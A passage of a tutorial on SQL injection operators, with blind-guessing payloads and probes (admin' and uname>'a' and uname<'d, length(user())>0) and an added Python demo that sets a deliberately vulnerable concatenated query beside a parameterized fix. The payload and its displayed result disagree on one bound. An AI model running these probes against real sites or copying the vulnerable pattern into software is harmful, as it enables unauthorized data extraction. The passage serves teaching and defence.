Relational and logical operators in SQL injection
1. Relational operators
Equals: select * from users where id = 10;
Greater-than, less-than, not-equal and the other comparison operators work the same way.
between: select * from users where id between 1 and 5;
in: select * from users where id in (1,2,3);
not in: select * from users where id not in (1,2,3);
is null: select * from users where id is null;
is not null: select * from users where id is not null;
like: select * from users where id like 'xiao%';
Blind injection guessing with relational operators
SQL query statement:
$sql="select * from users where uname='$uname'"
Normal parameter: uname=admin
Result:
select * from users where uname='admin'
Example of blind guessing against a web page:
Injected parameter: uname=admin' and uname>'a' and uname<'d
Result:
select * from users where uname='admin' and uname>'a' and uname<'b'
Testing the character length of the current account:
select * from users where uname='admin' and length(user())>0
Increase the number step by step; once it exceeds a certain value the page no longer renders normally, and the length of user() (the current account name) is that value.
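The reason the injected comparison above changes the result set is that the attacker-supplied value is spliced into the SQL text, so the closing quote and the appended `and uname>'a' and uname<'d` become part of the query. The following added example (not code from the original page) reproduces the page's `$sql="select * from users where uname='$uname'"` pattern against a constructed in-memory SQLite table and places a parameterized query beside it, so the difference in behaviour on the same input can be observed directly. The table contents, the function names and the use of SQLite are assumptions made for this illustration.

```python
import sqlite3

# Constructed sample data (not from the original page): a tiny users table.
SAMPLE_USERS = [("admin",), ("bob",), ("xiaoming",)]

# The injected parameter quoted on the page, used here only as the test input.
PAYLOAD = "admin' and uname>'a' and uname<'d"


def make_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, uname text)")
    conn.executemany("insert into users (uname) values (?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, uname):
    """Mirror the page's $sql="select * from users where uname='$uname'".

    The untrusted value is concatenated into the SQL text, so a quote in
    the input ends the string literal and anything after it is parsed as
    SQL. This is the pattern the blind-guessing technique relies on.
    """
    sql = f"select * from users where uname='{uname}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, uname):
    """Hardened form: the value is bound as a parameter, never parsed as SQL.

    The whole input string is compared as one literal against the uname
    column, so the relational operators in the payload have no effect.
    """
    return conn.execute(
        "select * from users where uname=?", (uname,)
    ).fetchall()


def row_counts(uname):
    """Return (rows from the vulnerable query, rows from the safe query)."""
    conn = make_db()
    try:
        return (
            len(lookup_vulnerable(conn, uname)),
            len(lookup_parameterized(conn, uname)),
        )
    finally:
        conn.close()


if __name__ == "__main__":
    # Normal input behaves the same either way; the payload does not.
    print("admin   ->", row_counts("admin"))
    print("payload ->", row_counts(PAYLOAD))
```

With the normal value `admin` both functions return the single matching row. With the page's payload the concatenated query still returns the admin row, because `admin` sorts between `a` and `d` and the appended conditions are evaluated as SQL, while the parameterized query returns nothing, since no account is literally named `admin' and uname>'a' and uname<'d`. The same binding approach also neutralises the `length(user())>0` probe, because the input can never escape the string literal to append a condition.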
2. Logical operators
AND: select * from user